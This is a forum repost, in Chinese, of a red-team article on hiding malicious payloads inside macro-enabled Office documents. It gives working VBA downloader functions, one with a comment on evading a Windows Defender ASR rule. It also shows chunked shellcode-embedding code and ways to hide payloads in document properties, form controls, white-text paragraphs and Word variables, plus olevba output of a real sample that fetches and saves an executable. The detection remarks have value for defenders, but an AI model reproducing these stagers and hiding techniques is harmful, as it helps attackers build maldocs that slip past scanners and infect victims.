DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 漏洞模板
查看: 3311|回复: 0

[样本分析] Backdooring Office Structures. Part 1: The Oldschool

[复制链接]

188

主题

35

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
354
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2022-8-10 17:29:27 | 显示全部楼层 |阅读模式

一、摘要


本系列文章讨论了攻击者使用启用宏的 Office 文档传递恶意代码的各种手段,我们概述了 stagedstageless 及相关 VBA 实现,然后在 OpenXML 结构中研究隐藏攻击者意图的问题。在第二部分中,我将我发现的技术 (将 Word、Excel 和 PowerPoint 中的恶意软件统一隐藏在未涵盖的存储中) 发布出来。

二、模拟与仿真


对手模拟练习有时需要团队去制定新的战术和武器,这就是红队走出模拟,转而探索敌对模拟领域的地方。他们需要尖端的进攻性研发,通常会吸引想要成为高薪科学家和网络雇佣兵的新人。然而在实际参与的过程中,当任务和压力的数量决定了必须做什么来代替可以做的事情时,在实际参与期间几乎没有时间进行设计和发明。

到目前为止,启用宏的 Office payload 已经吸引了我很长一段时间,因为它们优雅、出现在典型工作程序中。

为了减轻每次参与生成恶意文档的痛苦,我在过去三年的大部分时间里都在开发一个私有的初始访问生成框架,这促使我为同样的老问题发明了新的解决方案。其中一个问题是以更隐蔽的方式将 payload 嵌入恶意文档中的困境。

最近我决定是时候分享我武器化和使用的一些想法了,本文向读者介绍了在文档中隐藏 payload 的概念。下一部分将依次揭示另一种隐藏方式,用于在共享相同 VBA 检索原语的 Word、Excel 和 PowerPoint 中隐藏 payload。

但是,在进入之前,让我们先探索当前并在此过程中慢慢的积累。

三、典型的 payload 传送策略


威胁参与者和红队在其基于 office 的初始访问活动中使用的大多数恶意文档都必须将 shellcode、可执行文件或任何其他不可靠的文件释放到受感染的系统。有一些可行的方法可以做到这一点:

  • 从 Internet 获取 payload (stage)
  • 在 VBA 代码中嵌入 payload (stageless)
  • 在文档结构中的某处隐藏 payload (stageless)

四、Internet-staged payloads


从 Internet 中提取 payload 是一种优雅且轻量级的方法,因为它为对手提供了更大的灵活性和控制权。我们可以部署恶意文档,从攻击者控制的资源中获取第二阶段恶意软件,如果我们感觉到蓝队开始追捕,则将该恶意软件切换为良性

有两种常用的 Internet VBA stager 实现,在这里:

Microsoft.XMLHTTP

  1. Function obf_DownloadFromURL(ByVal obf_URL As String) As String
  2.     On Error GoTo obf_ProcError

  3.     '
  4.     ' Among different ways to download content from the Internet via VBScript:
  5.     '   - WinHttp.WinHttpRequest.5.1
  6.     '   - Msxml2.XMLHTTP
  7.     '   - Microsoft.XMLHTTP
  8.     ' only the last one was not blocked by Windows Defender Exploit Guard ASR rule:
  9.     '   "Block Javascript or VBScript from launching downloaded executable content"
  10.     '
  11.     With CreateObject("Microsoft.XMLHTTP")
  12.         .Open "GET", obf_URL, False
  13.         .setRequestHeader "Accept", "*/*"
  14.         .setRequestHeader "Accept-Language", "en-US,en;q=0.9"
  15.         .setRequestHeader "User-Agent", "<<<USER_AGENT>>>"
  16.         .setRequestHeader "Accept-Encoding", "gzip, deflate"
  17.         .setRequestHeader "Cache-Control", "private, no-store, max-age=0"
  18.         <<<HTTP_HEADERS>>>
  19.         .Send

  20.         If .Status = 200 Then
  21.             obf_DownloadFromURL = StrConv(.ResponseBody, vbUnicode)
  22.             Exit Function
  23.         End If
  24.     End With

  25. obf_ProcError:
  26.     obf_DownloadFromURL = ""
  27. End Function
复制代码

InternetExplorer.Application

  1. '
  2. ' Downloads Internet contents by instrumenting Internet Explorer's COM object.
  3. '
  4. Function obf_DownloadFromURL(ByVal obf_URL As String) As String
  5.     On Error GoTo obf_ProcError

  6.     With CreateObject("InternetExplorer.Application")
  7.         .Visible = False
  8.         .Navigate obf_URL

  9.         While .ReadyState <> 4 Or .Busy
  10.             DoEvents
  11.         Wend

  12.         obf_DownloadFromURL = StrConv(.ie.Document.Body.innerText, vbUnicode)
  13.         Exit Function
  14.     End With

  15. obf_ProcError:
  16.     obf_DownloadFromURL = ""
  17. End Function
复制代码

更常见的是前者,而后者在严重依赖 Internet Explorer 的环境中可能看起来更隐蔽。

然而,每种方法都有其缺点。从 Office 发送请求可能看起来是不寻常的活动,并在相关的事件包中再添加一个事件。

那么 VBA 发起的请求应该是什么样子也有两难选择?我们希望硬编码哪些标头,User-Agent?在哪托管该 payload,域,分类标签、TLS 证书内容如何?

从进攻性的角度来看,从 Internet 获取 payload 并不是我真正喜欢的事情。这种设计方法并没有解决问题,而是引入了其他问题。

五、在 VBA 中嵌入恶意软件


另一种方法可能更简单,但会避免连接互联网,保持 stageless 感染链。只要 Office 恶意软件存在,威胁行为者就一直依赖该原则:只需让 VBA 解码恶意软件字节,拼接好并释放完整的 payload blob。这么容易,对吧?

  1. Private Function obf_ShellcodeFunc81() As String
  2.     Dim obf_ShellcodeVar80 As String
  3.     obf_ShellcodeVar80 = ""
  4.     [...]
  5.     obf_ShellcodeVar80 = obf_ShellcodeVar80 & "800EK+3YvPe6wFO6tCVI91lg2Bi3ae8DNtlWbCczAi+XnmipCn3kRpi2js7bNntB0TC/qn2WiYP275Z9"
  6.     obf_ShellcodeVar80 = obf_ShellcodeVar80 & "HVkgI4GH7dOACixe7W5qjTL8HIzH6mYubKWDgvlbe72MfmkGUJKquPm+Ap5bRxceDpUag64Z3HccyfYM"
  7.     obf_ShellcodeVar80 = obf_ShellcodeVar80 & "NNacM35abBiGPNRBGL7G82Pv/uxL2G+aZgQXJdnxOLpTaj7QOJYb07+qqZa0v86U+dBpUWXziW7TiiAh"
  8.     [...]
  9.     obf_ShellcodeFunc81 = obf_ShellcodeVar80
  10. End Function

  11. Private Function obf_ShellcodeFunc35() As String
  12.     Dim obf_ShellcodeVar34 As String
  13.     obf_ShellcodeVar34 = ""
  14.     [...]
  15.     obf_ShellcodeVar34 = obf_ShellcodeVar34 & "5/FrooZq8NT/0izIE93LbjRes6WfzjpIWqthlztCSldPtj3QIga5wHXkiDbhTFcUHqOW9toGVUid9bv/"
  16.     obf_ShellcodeVar34 = obf_ShellcodeVar34 & "T5Hrm2PP+xPtVz/LlzFGbCL9aKXfTW7GEBQYpw66VQj/nOleZrciTLbN3noDJUo0AuGVtbNQUVu9zi3q"
  17.     obf_ShellcodeVar34 = obf_ShellcodeVar34 & "GpOYCZiaPNOxbBIiDdxgMvpoftErBPG/O65lfoP8ERbameOFCfybXWLZe3l3n6z/9rcmsZguSFr/tmoc"
  18.     [...]
  19.     obf_ShellcodeFunc35 = obf_ShellcodeVar34
  20. End Function

  21. Private Function obf_ShellcodeFunc3() As String
  22.     Dim obf_ShellcodeVar96 As String
  23.     obf_ShellcodeVar96 = ""
  24.     obf_ShellcodeVar96 = obf_ShellcodeVar96 & obf_ShellcodeFunc12()
  25.     obf_ShellcodeVar96 = obf_ShellcodeVar96 & obf_ShellcodeFunc15()
  26.     [...]
  27.     obf_ShellcodeVar96 = obf_ShellcodeVar96 & obf_ShellcodeFunc95()
  28.     obf_ShellcodeFunc3 = obf_ShellcodeVar96
  29. End Function
复制代码

VBA 语法强加了一些代码需要遵循的限制,我喜欢将其称为 128×128 规则

  • 单个 VBA 代码行中不超过 128 个字符
  • 单个 VBA 函数/子例程中不超过 128 行

违反其中任何一个都可能导致 VBE7.dll 运行时抱怨语法,从而打破我们的错误行为。

数十个过长的、返回string或Byte数组的类似VBA函数明显地突出,即使是非技术员工也会感到焦虑。cloud-detonation 或沙箱环境或自动化分析系统使用的机器学习模型也将根据预期的可疑程度的特征相似性来选择。

这种方法可能只有在我们希望隐藏的 payload 非常小时才可行。否则,从隐蔽性的角度来看,这是不行的。

六、受污染的文档结构


OpenXML 结构、XML 节点,我知道至少有十几个不同的地方可以插入 payload,从而使我们的恶意软件处于潜伏扫描仪的雷达之下。

让我们讨论几个,通常会在 Threat Actors 工件中遇到:

  • Document properties
  • Office Forms and their input or combo fields
  • ActiveDocument Paragraphs & Sheets Ranges
  • Word Variables

它们的共同特征是,恶意数据将以某种方式驻留在某些与 openxml 对齐的 XML 文件、节点或某个属性中。通常,我们使用专业的工具从那里提取恶意软件,例如 Philipe Lagadec 的 olevba 或 Didier Stevens 的 oledump

6.1 Document Properties


将 payload 隐藏在文档属性中的想法由来已久,几年前我曾遇到过这样的恶意样本。VBA 实现很简单,payload 的位置使得攻击者可以轻松调整它以快速更新他们的 payload。然而,对于自动扫描仪来说,提取隐藏数据并全速前进同样微不足道。





通常属性存储在 docProps/core.xml 和 docProps/app.xml 中,可以在解压 OpenXML (即 2007+) 后提取它们。

Example docProps/core.xml :

  1. <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  2. <cp:coreProperties
  3.     xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
  4.     xmlns:dc="http://purl.org/dc/elements/1.1/"
  5.     xmlns:dcterms="http://purl.org/dc/terms/"
  6.     xmlns:dcmitype="http://purl.org/dc/dcmitype/"
  7.     xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  8.     <dc:title></dc:title>
  9.     <dc:subject>calc.exe</dc:subject>
  10.     <dc:creator>john.doe</dc:creator>
  11.     <cp:keywords></cp:keywords>
  12.     <dc:description></dc:description>
  13.     <cp:lastModifiedBy>john.doe</cp:lastModifiedBy>
  14.     <cp:lastPrinted>2022-07-27T01:29:26Z</cp:lastPrinted>
  15.     <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-27T01:29:26Z</dcterms:created>
  16.     <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-27T01:29:26Z</dcterms:modified>
  17.     <cp:category></cp:category>
  18.     <dc:language>en-US</dc:language>
  19. </cp:coreProperties>
复制代码

core.xml 和 app.xml 都是我们在部署恶意软件之前总是匿名的,以避免 OPSEC 错误将顾问的电子邮件或恶意软件开发工作站的主机名留在文档的元数据中 (经典的 OPSEC 肯定会失败,每个红队成员在职业生涯中都会犯一次)。

从偏执逃避的角度来看,我不喜欢这种设计,因为它太出名了,提取起来微不足道,而且太容易暴露我的意图。

6.2 Office Forms


曾经有人使用 VBA 设计了一个表单,该表单由一个询问姓名的输入字段和一个可爱的小按钮组成,上面写着 Click me。如果该按钮被点击,一个 Hello <name>!问候可以使一个人的一天更美好。收集名称和引用它的按钮的输入字段。作者生活得很愉快,直到实习生拿起文档并通过使按钮运行 Shell(command-from-input-field) 而破坏了表单。

恶意软件作者注意到他们可以将其邪恶存储在表单控件中,然后在 VBA 运行和执行时动态地拉取它。

下面是一个样本的截图 (来自我个人的恶意软件分析集合):





好奇的恶意软件分析人员可以在此处找到该示例。

只要分析师审查样本,或者更确切地说,自动化沙箱和 AV 引擎不会意识到 Forms 可以传达的邪恶,这个想法可能会很有趣。不过,根据我的经验,现代 AV 或专业工具 (例如 olevba.py) 可以轻松嗅探和重建 Forms 内容。

这是一个将其提供给 olevba.py 进行分析的示例:

  1. cmd> olevba.py 2.xls

  2. [...]

  3. -------------------------------------------------------------------------------le - ☺♦llFile newFilename
  4. VBA FORM STRING IN '.\\2.xls' - OLE stream: '_VBA_PROJECT_CUR/FRM2/o'
  5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6. Microsoft.XMLHTTP*Adodb.Stream*Shell.Application*WScript.Shell*Process*GET*TEMP*Type*Open*write*responseBody*savetofile*\sepultura.exeIf YusssUUUKkahhyyuiooopY_17.FileExist(newFilename & ".layer") Then YusssUUUKkahhyyuiooopY_17.KillFile newFilename & ".layer"
  7. -------------------------------------------------------------------------------er"
  8. VBA FORM Variable "b'ComboBox1'" IN '.\\2.xls' - OLE stream: '_VBA_PROJECT_CUR/FRM2'
  9. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  10. b'Microsoft.XMLHTTP*Adodb.Stream*Shell.Application*WScript.Shell*Process*GET*TEMP*Type*Open*write*responseBody*savetofile*\\sepultura.exe'
  11. [...]
复制代码

正如我们所看到的 —— Form 没有机会对抗 olevba.py 解析逻辑。好吧,追求隐身的红队也不应该依赖这个。

6.3 ActiveDocument.Paragraphs & Sheet Ranges


另一种特定于 MS Word 的方法可能会滥用文档的静态实例公开的 Paragraphs 对象,另一个想法可能是使用以下方法将 payload 隐藏在远 Excel 单元格中:

  1. ThisWorkbook.Sheets("Sheet1").Ranges("BL417") = "evil"
复制代码

非常简单的存储,同样容易恢复。

在下面的截图中可以看到将其武器化的示例 (另一个来自我的恶意软件集合):



样本:https://www.virustotal.com/gui/f ... ea5e662ffa62a71ee7a

在第 1 行中,我们看到恶意软件的代码如何迭代。然后在 2 中提取文本范围,稍后将在 3 中取消异或并在 4 中构建可执行的 stage2。

对于有经验的分析师来说,对这样一个样本的剖析非常简单,因为它表现为 word/document.xml 的异常大小:

  1. remnux $ find . -ls
  2. remnux@mBase-dell:/mnt/d/shredder/1$ find . -ls
  3. drwxrwxrwx   1 remnux  remnux       512 Aug  4 13:02 .
  4. drwxrwxrwx   1 remnux  remnux       512 Aug  4 13:02 ./customXml
  5. -rwxrwxrwx   1 remnux  remnux       205 Dec 31  1979 ./customXml/item1.xml
  6. -rwxrwxrwx   1 remnux  remnux       341 Dec 31  1979 ./customXml/itemProps1.xml
  7. drwxrwxrwx   1 remnux  remnux       512 Aug  4 13:02 ./customXml/_rels
  8. -rwxrwxrwx   1 remnux  remnux       296 Dec 31  1979 ./customXml/_rels/item1.xml.rels
  9. drwxrwxrwx   1 remnux  remnux       512 Aug  4 13:02 ./docProps
  10. -rwxrwxrwx   1 remnux  remnux       996 Dec 31  1979 ./docProps/app.xml
  11. -rwxrwxrwx   1 remnux  remnux       630 Dec 31  1979 ./docProps/core.xml
  12. drwxrwxrwx   1 remnux  remnux       512 Aug  4 13:02 ./word
  13. -rwxrwxrwx   1 remnux  remnux    173096 Jun 29  2016 ./word/document.xml
  14. -rwxrwxrwx   1 remnux  remnux      1296 Dec 31  1979 ./word/fontTable.xml
  15. drwxrwxrwx   1 remnux  remnux       512 Aug  4 13:02 ./word/media
  16. -rwxrwxrwx   1 remnux  remnux    237387 Jun 29  2016 ./word/media/image1.png
  17. -rwxrwxrwx   1 remnux  remnux      2775 Dec 31  1979 ./word/numbering.xml
  18. -rwxrwxrwx   1 remnux  remnux      2937 Dec 31  1979 ./word/settings.xml
  19. -rwxrwxrwx   1 remnux  remnux     15636 Dec 31  1979 ./word/styles.xml
  20. drwxrwxrwx   1 remnux  remnux       512 Aug  4 13:02 ./word/theme
  21. -rwxrwxrwx   1 remnux  remnux      7021 Dec 31  1979 ./word/theme/theme1.xml
  22. -rwxrwxrwx   1 remnux  remnux      1061 Dec 31  1979 ./word/vbaData.xml
  23. -rwxrwxrwx   1 remnux  remnux     33824 Jun 29  2016 ./word/vbaProject.bin
  24. -rwxrwxrwx   1 remnux  remnux      1475 Dec 31  1979 ./word/webSettings.xml
  25. drwxrwxrwx   1 remnux  remnux       512 Aug  4 13:02 ./word/_rels
  26. -rwxrwxrwx   1 remnux  remnux      1346 Dec 31  1979 ./word/_rels/document.xml.rels
  27. -rwxrwxrwx   1 remnux  remnux       277 Dec 31  1979 ./word/_rels/vbaProject.bin.rels
  28. -rwxrwxrwx   1 remnux  remnux      1768 Dec 31  1979 ./[Content_Types].xml
  29. drwxrwxrwx   1 remnux  remnux       512 Aug  4 13:02 ./_rels
  30. -rwxrwxrwx   1 remnux  remnux       590 Dec 31  1979 ./_rels/.rels
复制代码

由于 document.xml 已经因其出人意料的巨大尺寸而引目,因此快速查看内部会发现恶意流

  1. <w:document> => <w:body> => <w:p> => <w:r>=> <w:t>
复制代码

XML 的一部分:

  1. [...]
  2. <w:szCs w:val="20"/>
  3. </w:rPr>
  4. </w:pPr>
  5. <w:r w:rsidRPr="006330C0">
  6. <w:rPr>
  7. <w:color w:val="FFFFFF" w:themeColor="background1"/>
  8. <w:szCs w:val="20"/>
  9. </w:rPr>
  10. <w:t>7E69A3333033333337333333CCCC33338B33333333333333733333333333333333333333333333333333333333333333333333333333333333333333B33333333D2C893D33873AFE128B327FFE12675B5A401343415C5441525E1350525D5D5C471351561341465D135A5D13777C60135E5C57561D3E3E391733333333333333637633337F323133DB8A40643333333333333333D3333C323832310133CD3333337D333333333333FCCC33333323333333233233333373333323333333313333373333333333333337333333333333333353323333313333342D3133313333333333233333233333333323333323333333333333233333333333333333333333837E323387333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333
  11. </w:t>
  12. </w:r>
  13. </w:p>
  14. <w:sectPr w:rsidR="006330C0" w:rsidRPr="006330C0" w:rsidSect="00313CAA">
  15. <w:pgSz w:w="11906" w:h="16838"/>
  16. <w:pgMar w:top="1417" w:right="1152" w:bottom="1417" w:left="1152" w:header="708" w:footer="708" w:gutter="0"/>
  17. <w:cols w:space="708"/>
  18. <w:docGrid w:linePitch="360"/>
  19. </w:sectPr>
  20. </w:body>
  21. </w:document>
复制代码

olevba.py 目前并未通过其恶意软件特征分析报告发现该异常。

缺失的地方可能表明,使用 ActiveDocument.Paragraphs,一个典型的 MS Word 容器可能在基于 Word 的社会工程借口中很有用。然而就个人而言,我不喜欢我的 XML 表现出类似的异常并明显突出。对我来说不行,但也许有人会喜欢它。

6.4 Word Variables


另一个特定于 Word 的 XML 滥用了旨在承载 Word 可以用来生成不同文档的动态数据的 变量存储。Pepitoh 在 VBad 中介绍了该存储的公共武器化示例,具体来说:

  1. def generate_generic_store_function(self, macro_name, variable_name, variable_value):
  2.         set_var = self.format_long_string(variable_value, "tmp")
  3.         if self.doc_type == ".doc":
  4.             gen_vba = """
  5.             Sub %(macro_name)s()
  6.             %(set_var)s
  7.             ActiveDocument.Variables.Add Name:="%(variable_name)s", Value:=%(variable_value)s
  8.             End Sub
  9.             """%{
  10.             "set_var" : set_var,
  11.             "macro_name" : macro_name,
  12.             "variable_name" : variable_name,
  13.             "variable_value": "tmp"
  14.             }
复制代码

VBad 将数据存储在变量中的方法是在 Word 打开时动态执行 VBA 代码。或者,我们可以以编程方式打开 word/settings.xml 并在 </w:settings> 之前插入以下两个节点:

  1. <w:docVars>
  2.     <w:docVar w:name="varName" w:val="contents..." />
  3. </w:docVars>
复制代码

在实际交战中,检查所有 payload 并手动更改其结构肯定有点麻烦。这就是为什么我在我的 Initial Access 框架中方便地实现了本文章系列中讨论的大多数原语。Python 是 Red Teamer 最好的朋友,当我的同事尖叫 Mariusz 时,我从不让我失望,我现在需要一个 Maldoc!受害者要求 "report.docm"。

示例 VBA 读取原语可能如下所示:

  1. Function obf_GetWordVariable(ByVal obf_name) As String
  2.     On Error GoTo obf_ProcError

  3.     obf_GetWordVariable = ActiveDocument.Variables(obf_name).Value
  4.    
  5. obf_ProcError:
  6.     obf_GetWordVariable = ""
  7. End Function
复制代码

然而看起来很酷,olevba.py 比它更聪明:



七、结论


本文讨论了攻击者可能采用的各种手段来使用 Office 文档传递其恶意代码。我们已经探索了在 VBA 模块之外获取恶意负载的不同方法,使其简短且无害。

在下一部分中,我们将讨论另一种方法,我发现在过去的几次交战中我发现了成功且令人满意的隐秘性。这使我们能够有效地保持我们的 CustomBase64(XorEncoded(.NET assemblies)) 为 DotNetToJScript 风格的主干提供数据 —— 在 VBA OLE 流之外,同时避免了设置 Internet-staging 的麻烦。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-11-23 17:56 , Processed in 0.067873 second(s), 27 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表